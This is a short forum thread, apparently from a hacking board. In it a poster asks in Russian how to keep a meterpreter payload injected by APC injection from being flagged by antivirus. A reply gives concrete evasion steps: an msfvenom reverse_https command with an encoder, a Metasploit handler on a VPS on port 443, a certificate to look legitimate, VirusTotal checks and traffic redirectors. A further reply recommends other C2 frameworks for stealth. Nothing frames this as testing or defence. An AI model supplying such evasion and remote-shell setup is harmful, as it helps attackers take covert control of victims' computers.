meterpretter

[goingHeavenTogether]

Создал пэйлоад в msfvenom и закинул его в свою программу. Программа делает обычную APC-инъекцию. Если тестировать на бесполезном шеллкоде, типа cmd/windows/exec, который спавнит калькулятор или любое другое приложение, то всё ок. Нет детекта от статического анализа и в динамическом тоже все спокойно. Но когда я создаю windows/x64/meterpreter/reverse_tcp процесс помечается как опасный (сигнатура meterpretter) и удаляется. Шеллкод хранится в зашифрованном виде и расшифровывается перед инъекцией. Думаю проблема в том, что трафик не шифруется и если выбрать другой пэйлоад станет лучше. Вопрос какой пэйлоад выбрать, чтобы он не палился?

 

[n3xtr4n]

• Generate the Payload: msfvenom -p windows/x64/meterpreter/reverse_https LHOST=<your_C2_IP> LPORT=443 -f raw -o payload.bin -i 5 --encoder x64/shikata_ga_nai. Swap reverse_https for reverse_tcp_ssl if you prefer.
• Set Up C2: Spin up a VPS, install Metasploit, and configure a handler: use exploit/multi/handler; set PAYLOAD windows/x64/meterpreter/reverse_https; set LHOST 0.0.0.0; set LPORT 443; run. Get a domain and cert to make it look legit.
• Integrate with Your Injector: Keep your APC injection code as is decrypt the new payload.bin at runtime and inject. Test on a VM first to confirm no AV flags.
• Test Evasion: Use VirusTotal or a sandbox like Hybrid Analysis to check if the new payload’s traffic gets flagged. If it does, tweak encoders or try a different payload.
• Network Camouflage: Route C2 through a redirector (e.g., Nginx proxy) to obscure your VPS. Use tools like socat or iptables to forward traffic.

 

[n3xtr4n]

If you’re still getting flagged, consider rolling your own C2 framework instead of Metasploit. Meterpreter’s too well-known. Tools like Cobalt Strike or open-source alternatives like Empire or Covenant have more modern, flexible payloads that are harder to detect. You’d need to write custom shellcode to integrate with your APC injector, but it’s worth it for stealth.